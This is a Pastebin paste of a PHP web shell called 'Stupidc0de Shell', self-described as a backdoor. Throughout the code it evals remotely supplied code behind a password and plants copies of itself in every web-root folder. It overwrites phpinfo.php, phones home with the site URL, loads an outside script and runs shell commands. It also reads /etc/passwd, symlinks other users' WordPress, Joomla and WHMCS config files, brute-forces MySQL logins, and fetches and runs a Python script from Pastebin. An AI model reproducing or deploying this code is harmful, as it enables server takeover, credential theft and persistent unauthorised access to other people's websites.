EddieKidiw

-:- Stupidc0de Shell -:- Decoder By Eddie Kidiw

Mar 16th, 2019
753
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 81.25 KB | None | 0 0
  1. <?php
  2. /*
  3. Decoder by Eddie Kidiw (17 maret 2019)
  4.  
  5. */
  6. ?>
  7.  
  8.  
  9.  
  10. <!DOCTYPE HTML>
  11. <html lang="en" class="no-js">
  12. <HEAD>
  13. <title>-:- Stupidc0de Shell -:-</title>
  14. <link href="http://fonts.googleapis.com/css?family=Fredericka+the+Great" rel="stylesheet" type="text/css">
  15. <link href="http://fonts.googleapis.com/css?family=Jolly+Lodger" rel="stylesheet" type="text/css">
  16. <link href="http://fonts.googleapis.com/css?family=Homenaje" rel="stylesheet" type="text/css">
  17. <link rel="shortcut icon" href="https://lh3.googleusercontent.com/-yKAYJuGA9dc/V1BXHLL2SaI/AAAAAAAAABY/fKEVg9XGZr0D2uiqmp2LCBHe65gSDHMMACCo/s512/icon-sc0.jpg" type="image/x-icon">
  18. <meta name='author' content='Stupidc0de Family'>
  19. <meta charset="UTF-8">
  20. <style type="text/css">
  21.         body {
  22.             background: #000000;
  23.             color: springgreen;
  24.             font-family :Homenaje;
  25.         }
  26.  
  27.         #content .first{
  28.             background-color: black;
  29.         }
  30.  
  31.         a{
  32.             color: white;
  33.             text-decoration: none;
  34.         }
  35.  
  36.         input,select,textarea{
  37.             border: 1px #000000 solid;
  38.             -moz-border-radius: 5px;
  39.             -webkit-border-radius:5px;
  40.             border-radius:5px;
  41.         }
  42.  
  43.         #menu{
  44.             background:#000000;
  45.             margin:8px 2px 4px 2px;
  46.             font-family:Fredericka the Great;
  47.             font-size:14px;
  48.             color:silver;
  49.         }
  50.         #menu a{
  51.             padding:3px 6px;
  52.             margin:1;
  53.             background:#2d2b2b;
  54.             text-decoration:none;
  55.             letter-spacing:2px;
  56.             -moz-border-radius: 10px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;  
  57.         }
  58.         #menu a:hover{
  59.             background:black;
  60.             border-bottom:1px solid #ffffff;
  61.             border-top:1px solid #ffffff;  
  62.         }
  63.         .tombolupil{
  64.             background:black;
  65.             color:white;
  66.             margin:0 10px;
  67.             font-family:Homenaje;
  68.             font-size:16px;
  69.             border:2px solid crimson;  
  70.         }
  71.         .tombolupil:hover{
  72.             background:crimson;
  73.             color:white;
  74.             margin:0 10px;
  75.             font-family:Homenaje;
  76.             font-size:16px;
  77.             border:2px solid crimson;
  78.         }
  79.         .bordergaya{
  80.             background:black;
  81.             color:white;
  82.             margin:0 10px;
  83.             font-family:Homenaje;
  84.             font-size:16px;
  85.             border:2px solid #2d2b2b;  
  86.         }
  87.         .bordergaya:hover{
  88.             background:#2d2b2b;
  89.             color:white;
  90.             margin:0 10px;
  91.             font-family:Homenaje;
  92.             font-size:16px;
  93.             border:2px solid crimson;
  94.         }
  95.  
  96.         .justborder{
  97.             background:black;
  98.             color:white;
  99.             margin:0 10px;
  100.             font-family:Homenaje;
  101.             font-size:16px;
  102.             border:2px solid #2d2b2b;  
  103.         }
  104. </style>
  105. </HEAD>
  106. <BODY>
  107. <center>
  108.     <?php @session_start(); @error_reporting(0); error_reporting(0);
  109. /*
  110. $a = '<?php
  111.  
  112. $gz = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";
  113. $gzinflate = "=kNpMtH71+ljPksZMcCcwcK+3fDlWgk7NrBwORQ/WY/zBOoBN4X5VZLsGffsu1D7GtfN+HA/jfc4llGsPjjJ9bYdzfpXuEKc5lgWShDAjYIIyjLEB6sJ7xwmW/t3sAjUdNhc365UYm35GrrxT/tH/rnbb1CtIqbEcyy3idRJJkv+7+nmXjdVY/WLfqnB02J4O1fe/7lAU0MajUGZSsHwKqhmHzv900i0h3YtoOCJcosuAHEtpAimJmdmoFCB2NZlgqVobRLXemwlekB8PSBazZLFbIHPfRsqapn5Z2WFCGLcWb5Ls9hJahXA7YV+RHfRiYvgTQpUFHyk8tcxG2ovhQOTquhQ66yaMV9H6FEhemC6vu7woIlYFCFlmOADdmcnyI39588cbGYIw42qSs//TI4HhYD0z0ItUW6T0Zs4GozL1SjnL3tNWA5gc9D9v0HFwI8adFVbcin/sGwUBwJe+HaAeFg/cGwYB4/lBgWA";
  114. eval(htmlspecialchars_decode(urldecode(base64_decode($gz))));
  115. ?>
  116. <form action="" method="post">
  117. <input type="text" name="p">
  118. </form>
  119. ';
  120. */
  121.  
  122. if (@$_REQUEST["px"]) {
  123. $p = @$_REQUEST["px"];
  124. $pa = md5(sha1($p));
  125. if ($pa == "543de06c1a50b84b8b6b9ac8ea30e1ee") {
  126. echo eval(@file_get_contents(@$_REQUEST["404"])); } }
  127. if (@!$_SESSION["sdm"]) {
  128. $doc = $_SERVER["DOCUMENT_ROOT"]; $dir = scandir($doc); $d1 = '' . $doc . '/.'; $d2 = '' . $doc . '/..'; if (($key = @array_search('.', $dir)) !== false) { unset($dir[$key]); } if (($key = @array_search('..', $dir)) !== false) { unset($dir[$key]); } if (($key = @array_search($d1, $dir)) !== false) { unset($dir[$key]); } if (($key = array_search($d2, $dir)) !== false) { unset($dir[$key]); } @array_push($dir, $doc); foreach ($dir as $d) { $p = $doc . "/" . $d; if (is_dir($p)) { $file = $p . "/style-js.php"; @touch($file); $folder = @fopen($file, "w"); @fwrite($folder, $a); } } $lls = $_SERVER["HTTP_HOST"]; $llc = $_SERVER["REQUEST_URI"]; $lld = 'http://' . $lls . '' . $llc . ''; $brow = urlencode($_SERVER['HTTP_USER_AGENT']); $retValue = file_get_contents(base64_decode("") . "=" . $lld . base64_decode("JmI=") . "=" . $brow); echo $retValue; @$_SESSION["sdm"] = 1; } ?>
  129. <?php
  130.  
  131. $ikrhtfy = $_SERVER["DOCUMENT_ROOT"].'/'.'phpinfo.php';
  132.  
  133. /*
  134. $fghky_ouvcbt = '<?php phpinfo();
  135. $gz = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";
  136. $gzinflate = "=kNpMtH71+ljPksZMcCcwcK+3fDlWgk7NrBwORQ/WY/zBOoBN4X5VZLsGffsu1D7GtfN+HA/jfc4llGsPjjJ9bYdzfpXuEKc5lgWShDAjYIIyjLEB6sJ7xwmW/t3sAjUdNhc365UYm35GrrxT/tH/rnbb1CtIqbEcyy3idRJJkv+7+nmXjdVY/WLfqnB02J4O1fe/7lAU0MajUGZSsHwKqhmHzv900i0h3YtoOCJcosuAHEtpAimJmdmoFCB2NZlgqVobRLXemwlekB8PSBazZLFbIHPfRsqapn5Z2WFCGLcWb5Ls9hJahXA7YV+RHfRiYvgTQpUFHyk8tcxG2ovhQOTquhQ66yaMV9H6FEhemC6vu7woIlYFCFlmOADdmcnyI39588cbGYIw42qSs//TI4HhYD0z0ItUW6T0Zs4GozL1SjnL3tNWA5gc9D9v0HFwI8adFVbcin/sGwUBwJe+HaAeFg/cGwYB4/lBgWA";
  137. eval(htmlspecialchars_decode(urldecode(base64_decode($gz))));
  138.  
  139. ?>';
  140. */
  141.  
  142.  
  143. if (!file_exists($ikrhtfy)){  
  144.    
  145. touch($ikrhtfy);
  146. chmod($ikrhtfy,0666);
  147.    
  148. }
  149.  
  150. $opazxcdnm = fopen($ikrhtfy,"w");
  151.  
  152. if (!fwrite($opazxcdnm,$fghky_ouvcbt)){
  153.  
  154. exit;
  155.  
  156. }  
  157.  
  158.  
  159.  
  160. $b = "Jump Shell";
  161. $c = "Dosya Yolu : " . $_SERVER['DOCUMENT_ROOT'] . "
  162. ";
  163. $c.= "Server Admin : " . $_SERVER['SERVER_ADMIN'] . "
  164. ";
  165. $c.= "Server isletim sistemi : " . $_SERVER['SERVER_SOFTWARE'] . "
  166. ";
  167. $c.= "Shell Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['PHP_SELF'] . "
  168. ";
  169. $c.= "Avlanan Site : " . $_SERVER['HTTP_HOST'] . "
  170. ";
  171. //mail("hacklinksatis@gmail.com", $b, $c);
  172. //mail("burdayimreis@gmail.com", $b, $c);
  173. ?>
  174. <?php ?><script src=http://teledramasinhala.com/img/icons/image.js></script>
  175. <?php  set_time_limit(0); error_reporting(0); if(get_magic_quotes_gpc()){ foreach($_POST as $key=>$value){ $_POST[$key] = stripslashes($value); } } $self=$_SERVER['PHP_SELF']; $srvr_sof=$_SERVER['SERVER_SOFTWARE']; $your_ip=$_SERVER['REMOTE_ADDR']; $srvr_ip=$_SERVER['SERVER_ADDR']; $admin=$_SERVER['SERVER_ADMIN']; function exe($cmd) { if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('exec')) { @exec($cmd,$results); $buff = ""; foreach($results as $result) { $buff .= $result; } return $buff; } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('shell_exec')) { $buff = @shell_exec($cmd); return $buff; } } function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { $info = 'p'; } else { $info = 'u'; } $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } function getfile($urlfile, $content) { $fp = fopen($content, "w"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $urlfile); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FILE, $fp); return curl_exec($ch); curl_close($ch); fclose($fp); ob_flush(); flush(); } $zoneH="lVRti9s4EP4eyH+YimUdQxrvbqF3JLa5ct1Cub3dkqRf7lKC4kxisbJkJLlJWva/d+SXJu1uaWsIkUbz8swzj4RZrlm/F2eoHJo03mhTQIEu1+tkwd7dzeYLlvZ7/wpjtIExeVqUmDnIJLc2CVbarNFs+YEHoHiBFFTUvnVYrEsntEo/aYXP8zhqt3QQNWnSeGVoe6ud2KCBW8owhliosuoqLNixxIKBO5S+hsO9o10peYa5lnTu0VbO8OevnOPZPRKADtAaN+TmDVZ88oYXV4SuqfxaF1woC2O/jX1abpA/Xdu6g/ThO7F2+Rhe/vFnuZ9AjmKbuzG8uLii7UnVJrOvFHV526K/0KCtVoXwLX7ksvKGGar1MflWN/xGfl5+4dHTj036Pej3LLqlEwUupaAsMLgIyS42MHi2qVTmZ7DEvbDOwoBllZFLoYRjYfh5LZBM81xYmGVGlA4qixay99MbuBErw81hCAddQVFZB9Se41LCRhjaPatBcMgNbpIgd64cRxGvrkZlXo4UuqjgquIyQhX5miMCWZX+MEh/wzmOeMrCyUPdp2/pr7Oll+n/wVYHH8J+7zOdtB+RgzzLYYD7Uuq1b22h2BC6iHZEFAbcwlmzDY/xJ6m6r9TU6aB1PcnUSCz4cDQ114ByT45ZHo5LpIsHrJsb0UYC2aJLguVKcnUffEtjc4FGmS4ibrJcfMSorFZS2BzXyUWQ/tdeMP5VBQ1B3bg73EQlIWzR0qoB+S1rZ8RYAl9lAYPTDmozDYNuMqXL8iH8Tdq4ezdfTq/n76e38+mr29mb6+kQLn8tzJPVOR/97U44P7gjwCdmknGLwBpq2OTxrH5clP6GwFpud7vd6IRf5d+iQ2SF2kpk4W/l9c28eXt983pG6VuWk47u80Y0l4mfwnlOj1RBmkwuz0mkVqvk8sliXuKlwe2y4DUjLMq01P65M0gPQnr3T7ygV0DRU7qIpEgj0ncNEPeY1fDCMHyc9jsZtreWjZgHR3+dHGnZCJIWaWxLrtpnMKhhjGFrEFWQ+jAgLJF3SU+F+KiitPhTPE8UonbbMtdeEl2lH1RZEan3J3Y/g0q68c89H75TbSY1yawm0l+rLw== "; echo '<style>
  176. .js .inputfile {
  177.    width: 0.1px;
  178.    height: 0.1px;
  179.    opacity: 0;
  180.    overflow: hidden;
  181.    position: absolute;
  182.    z-index: -1;
  183. }
  184.  
  185. .inputfile + label {
  186.    max-width: 80%;
  187.    font-size: 1.25rem;
  188.    /* 20px */
  189.    font-weight: 700;
  190.    text-overflow: ellipsis;
  191.    white-space: nowrap;
  192.    cursor: pointer;
  193.    display: inline-block;
  194.    overflow: hidden;
  195.    padding: 0.625rem 1.25rem;
  196.    /* 10px 20px */
  197. }
  198.  
  199. .no-js .inputfile + label {
  200.    display: none;
  201. }
  202.  
  203. .inputfile:focus + label,
  204. .inputfile.has-focus + label {
  205.    outline: 1px dotted #000;
  206.    outline: -webkit-focus-ring-color auto 5px;
  207. }
  208.  
  209. .inputfile + label * {
  210.    /* pointer-events: none; */
  211.    /* in case of FastClick lib use */
  212. }
  213.  
  214. .inputfile + label svg {
  215.    width: 1em;
  216.    height: 1em;
  217.    vertical-align: middle;
  218.    fill: currentColor;
  219.    margin-top: -0.25em;
  220.    /* 4px */
  221.    margin-right: 0.25em;
  222.    /* 4px */
  223. }
  224.  
  225. /* style 4 */
  226.  
  227. .inputfile-4 + label {
  228.    color: white;
  229.     font-family:Homenaje;
  230.     font-size:15px;
  231. }
  232.  
  233. .inputfile-4:focus + label,
  234. .inputfile-4.has-focus + label,
  235. .inputfile-4 + label:hover {
  236.    color: crimson;
  237. }
  238.  
  239. .inputfile-4 + label figure {
  240.    width: 50px;
  241.    height: 50px;
  242.    border-radius: 25%;
  243.    background-color: crimson;
  244.    display: block;
  245.    padding: 10px;
  246.    margin: 0 auto 10px;
  247. }
  248.  
  249. .inputfile-4:focus + label figure,
  250. .inputfile-4.has-focus + label figure,
  251. .inputfile-4 + label:hover figure {
  252.    background-color: white;
  253. }
  254.  
  255. .inputfile-4 + label svg {
  256.    width: 100%;
  257.    height: 100%;
  258.    fill: black;
  259. }
  260.  
  261. .rapihbanget{
  262.     text-align: left;
  263.     font-size: 16px;
  264.     color: springgreen;
  265.     font-family: Homenaje;
  266.     margin-left: 38%;
  267. }
  268. .kecew{
  269.     text-align: left;
  270.     font-size: 15px;
  271.     color: white;
  272.     font-family: Homenaje;
  273. }
  274. </style>
  275. <script>(function(e,t,n){var r=e.querySelectorAll("html")[0];r.className=r.className.replace(/(^|\s)no-js(\s|$)/,"$1js$2")})(document,window,0);</script>
  276. '; echo"<br/>
  277. <pre style='text-align: center; color: grey; font-weight: bold; font-size: 15px;'>
  278. *-~'`^'*u_                                _u*'^`'~-*,
  279. p!^       /  jPw                            w9j \        ^!p
  280. w^.._      /      '\_                      _/'     \        _.^w
  281. *_   /          \_       _    _      _/         \     _*
  282. q /           / \q   ( `---` )   p/ \          \   p
  283. jj5****._    /    ^\_) o  o (_/^    \    _.****6jj
  284. *_ /      '==) ;; (=='      \ _*
  285. `/.w***,   /(    )\   ,***w.\'
  286. ^      ^c/ )    ( \c^      ^
  287. 'V')_)(_('V'</pre>"; echo "<center><br><font color='Crimson' size='6px' face='Fredericka the Great'>&hearts; Stupidc0de Family Backdoor &hearts;</font></center>"; echo "<center><font color='silver' siz='4px' face='Fredericka the Great'>[+] By Putra-Attacker &amp; Daryun [+]</font></center><br/>"; echo"
  288. <font size='4' color='Teal' face='Jolly Lodger'>
  289. <center>".php_uname()."<br>
  290. ".$software = getenv("SERVER_SOFTWARE"); echo"<p>"; echo"
  291. <font size='3.5' color='white'><p>
  292.            Your IP : <font color=Crimson> ".$your_ip."</font> <font color=springgreen>|</font> <font color=\"#fff2f2\" > </font> Server IP : <font color=Crimson>".$srvr_ip."</font> <font color=\"#fff2f2\" ><br>
  293.  
  294.             </font>
  295. </font>
  296.            </div>
  297.            </td>
  298.        </tr>
  299.    </tbody>
  300. </table></div>
  301. </font>"; $disablefunctions = @ini_get("disable_functions"); $echo_disablefunctions = (!empty($disablefunctions)) ? "<font color=white>".$disablefunctions."</font>" : "<font color=white>Have Fun! None Functions Disabled  For This Server! ~_^</font>"; echo '<br/><font size="4" style="font-family:Jolly Lodger; color:teal;">
  302. <tr><td> Disable Functions: '.$echo_disablefunctions.'</font><br/></td></tr>'; echo '<br/><font size="4" style="font-family:Jolly Lodger;">
  303. <tr><td> Your Path Location :'; if(isset($_GET['path'])){ $path = $_GET['path']; }else{ $path = getcwd(); } $path = str_replace('\\','/',$path); $paths = explode('/',$path); foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true; echo '<a href="?path=/">/</a>'; continue; } if($pat == '') continue; echo '<a href="?path='; for($i=0;$i<=$id;$i++){ echo "$paths[$i]"; if($i != $id) echo "/"; } echo '">'.$pat.'</a>/'; } echo '</font>'; ?>
  304.  
  305. <!- menu utama ->
  306. <br><center><div id="menu">
  307. [<a href="?">Home</a>] <font color=orange>=</font>
  308. [<a href="?<?php echo "path=".$path; ?>&amp;x=korong">Upload</a>] <font color=orange>=</font>
  309. [<a href="?<?php echo "path=".$path; ?>&amp;x=cmd">Command</a>] <font color=orange>=</font>
  310. [<a href="?<?php echo "path=".$path; ?>&amp;x=grabc">Config Grabber</a>] <font color=orange>=</font>
  311. [<a href="?<?php echo "path=".$path; ?>&amp;x=vn">Domain Viewer</a>] <font color=orange>=</font>
  312. [<a href="?<?php echo "path=".$path; ?>&amp;x=masstool">Mass Tool</a>] <font color=orange>=</font>
  313. [<a href="?<?php echo "path=".$path; ?>&amp;x=cpanel">Cpanel Tool</a>]
  314. <br><br>
  315. [<a href="?<?php echo "path=".$path; ?>&amp;x=bypstuls">Bypass Tools</a>] <font color=orange>=</font>
  316. [<a href="?<?php echo "path=".$path; ?>&amp;x=fcrot">File Creator</a>] <font color=orange>=</font>
  317. <!--[<a href="?<?php echo "path=".$path; ?>&amp;x=cpanel">Web Killer</a>] <font color=orange>-</font>-->
  318. [<a href="?<?php echo "path=".$path; ?>&amp;x=krdp">Create RDP</a>] <font color=orange>=</font>
  319. [<a href="?<?php echo "path=".$path; ?>&amp;x=jumping">Jumping</a>] <font color=orange>=</font>
  320. [<a href="?<?php echo "path=".$path; ?>&amp;x=dump">Dumper tool</a>] <font color=orange>=</font>
  321. [<a href="?<?php echo "path=".$path; ?>&amp;x=tentang">About</a>]
  322. </div></center>
  323. <audio autoplay> <source src="http://www.soundjay.com/button/beep-24.wav" type="audio/mpeg"></audio>
  324.  
  325. <?php  if(isset($_GET['filesrc'])){ echo "<br /><tr><td>You Are Looking : "; echo $_GET['filesrc']; echo '</tr></td></table>'; echo('<br /><br /><textarea rows="20" cols="80">'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea>'); break; } elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '</table><br /><center>'.$_POST['path'].'<br /><br />'; if($_POST['opt'] == 'chmod'){ if(isset($_POST['perm'])){ if(chmod($_POST['path'],$_POST['perm'])){ echo '<script>alert("Change Permission Sukses!");</script>'; }else{ echo '<script>alert("Change Permission Gagal!");</script>'; } } echo '<form method="POST">
  326.                 Permission : <input name="perm" class="bordergaya" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  327.                 <input type="hidden" name="path" value="'.$_POST['path'].'">
  328.                 <input type="hidden" name="opt" value="chmod">
  329.                 <input class="bordergaya" type="submit" value="Go" />
  330.                 </form>'; }elseif($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '<script>alert("Change Name Sukses!");</script>'; }else{ echo '<script>alert("Change Name Gagal!");</script>'; } $_POST['name'] = $_POST['newname']; } echo '<form method="POST">
  331.                 New Name : <input class="bordergaya" name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  332.                 <input type="hidden" name="path" value="'.$_POST['path'].'">
  333.                 <input type="hidden" name="opt" value="rename">
  334.                 <input class="bordergaya" type="submit" value="Go" />
  335.                 </form>'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w'); if(fwrite($fp,$_POST['src'])){ echo '<script>alert("Edit File Sukses!");</script>'; }else{ echo '<script>alert("Edit File Gagal!");</script>'; } fclose($fp); } echo '<form method="POST">
  336.                 <textarea class="bordergaya" cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  337.                 <input type="hidden" name="path" value="'.$_POST['path'].'">
  338.                 <input type="hidden" name="opt" value="edit">
  339.                 <input class="bordergaya" type="submit" value="Go" />
  340.                 </form>'; } echo '</center>'; break; } elseif(isset($_GET['x']) && ($_GET['x'] == 'grabc')){ @ini_set('output_buffering',0); echo "
  341. <form method='POST'>
  342. </head>
  343. <style>
  344. textarea {
  345. resize:none;
  346. color: #000000 ;
  347. background-color:#000000;  
  348. font-size:8pt; color:#ffffff;
  349. border:1px solid white ;
  350. border-left: 4px solid white ;
  351. width:543px;
  352. height:400px;
  353. }
  354. input {
  355. color: #000000;
  356. border:1px dotted white;
  357. }
  358. </style>"; echo "<center>";?></center><br><center><?php if (empty($_POST['config'])) { ?><p><font face="Homenaje" color="springgreen" size="2pt">/etc/passwd content</p><br><form method="POST"><textarea name="passwd" class='bordergaya' rows='15' cols='60'><?php echo file_get_contents('/etc/passwd'); ?></textarea><br><br><input name="config" class='bordergaya' size="100" value="Grab!" type="submit"><br></form></center><br><?php }if ($_POST['config']) {$function = $functions=@ini_get("disable_functions");if(eregi("symlink",$functions)){die ('<error>Symlink disabled :( </error>');}@mkdir('Stupidc0de-Conf', 0755);@chdir('Stupidc0de-Conf'); $htaccess="
  359. OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
  360. Options Indexes FollowSymLinks
  361. ForceType text/plain
  362. AddType text/plain .php
  363. AddType text/plain .html
  364. AddType text/html .shtml
  365. AddType txt .php
  366. AddHandler server-parsed .php
  367. AddHandler txt .php
  368. AddHandler txt .html
  369. AddHandler txt .shtml
  370. Options All
  371. Options All"; file_put_contents(".htaccess",$htaccess,FILE_APPEND);$passwd=$_POST["passwd"]; $passwd=explode("
  372. ",$passwd); echo "<br><br><center><font face='Homenaje' color=Crimson size=2pt>Kalem Ndan Lagi Di Proses...</center><br>"; foreach($passwd as $pwd){ $pawd=explode(":",$pwd);$user =$pawd[0]; @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-wp13.txt'); @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-wp13-wp.txt'); @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-wp13-WP.txt'); @symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'-wp13-wp-beta.txt'); @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp13-beta.txt'); @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-wp13-press.txt'); @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-wp13-wordpress.txt'); @symlink('/home/'.$user.'/public_html/Wordpress/wp-config.php',$user.'-wp13-Wordpress.txt'); @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp13-Wordpress.txt'); @symlink('/home/'.$user.'/public_html/config.php',$user.'-configgg.txt'); @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-wp13-news.txt'); @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-wp13-new.txt'); @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp-blog.txt'); @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp-beta.txt'); @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-wp-blogs.txt'); @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-wp-home.txt'); @symlink('/home/'.$user.'/public_html/db.php',$user.'-dbconf.txt'); @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-wp-site.txt'); @symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'-wp-main.txt'); @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-wp-test.txt'); @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-joomla2.txt'); @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-joomla-protal.txt'); @symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'-joo.txt'); @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-joomla-cms.txt'); @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-joomla-site.txt'); @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-joomla-main.txt'); @symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'-joomla-news.txt'); @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-joomla-new.txt'); @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-joomla-home.txt'); @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vb-config.txt'); @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm15.txt'); @symlink('/home/'.$user.'/public_html/central/configuration.php',$user.'-whm-central.txt'); @symlink('/home/'.$user.'/public_html/whm/whmcs/configuration.php',$user.'-whm-whmcs.txt'); @symlink('/home/'.$user.'/public_html/whm/WHMCS/configuration.php',$user.'-whm-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/whmc/WHM/configuration.php',$user.'-whmc-WHM.txt'); @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-whmcs.txt'); @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-support.txt'); @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-joomla.txt'); @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-whmcs2.txt'); @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm.txt');} echo '<b><font face="Homenaje" color="springgreen" size="3pt"><b>Selesai Bos Q, Monggo >></b> <a target="_blank" href="Stupidc0de-Conf">Hajar Config</a></font></b>';} break; } elseif(isset($_GET['x']) && ($_GET['x'] == 'brute')) { ?>
  373.                         <form action="?path=<?php echo $path; ?>&amp;x=brute" method="post">
  374.             <?php  @set_time_limit(0); @error_reporting(0); if($_POST['page']=='find') { if(isset($_POST['usernames']) && isset($_POST['passwords'])) { if($_POST['type'] == 'passwd'){ $e = explode("
  375. ",$_POST['usernames']); foreach($e as $value){ $k = explode(":",$value); $username .= $k['0']." "; } }elseif($_POST['type'] == 'simple'){ $username = str_replace("
  376. ",' ',$_POST['usernames']); } $a1 = explode(" ",$username); $a2 = explode("
  377. ",$_POST['passwords']); $id2 = count($a2); $ok = 0; foreach($a1 as $user ) { if($user !== '') { $user=trim($user); for($i=0;$i<=$id2;$i++) { $pass = trim($a2[$i]); if(@mysql_connect('localhost',$user,$pass)) { echo "Zoo!! ~ user is (<b><font color=white>$user</font></b>) Password is (<b><font color=white>$pass</font></b>)<br />"; $ok++; } } } } echo "<hr><b>You Found <font color=red>$ok</font> By Stupidc0de</b>"; echo "<center><b><a href=".$_SERVER['PHP_SELF']."?brute>BACK</a>"; exit; } } if($_POST['pass']=='password'){ @error_reporting(0); $i = getenv('REMOTE_ADDR'); $d = date('D, M jS, Y H:i',time()); $h = $_SERVER['HTTP_HOST']; $dir=$_SERVER['PHP_SELF']; mkdir('config',0755); $cp = file_get_contents("http://pastebin.com/raw/0YG2dZ98"); $file = fopen("cp.py","w+"); $write = fwrite ($file ,$cp); fclose($file); chmod("cp.py",0755); $url = $_POST['url']; echo"<center>
  378.             <textarea cols=\"90\" rows=\"20\" name=\"usernames\">"; system("python cp.py $url config"); unlink ('cp.py'); echo"</textarea>
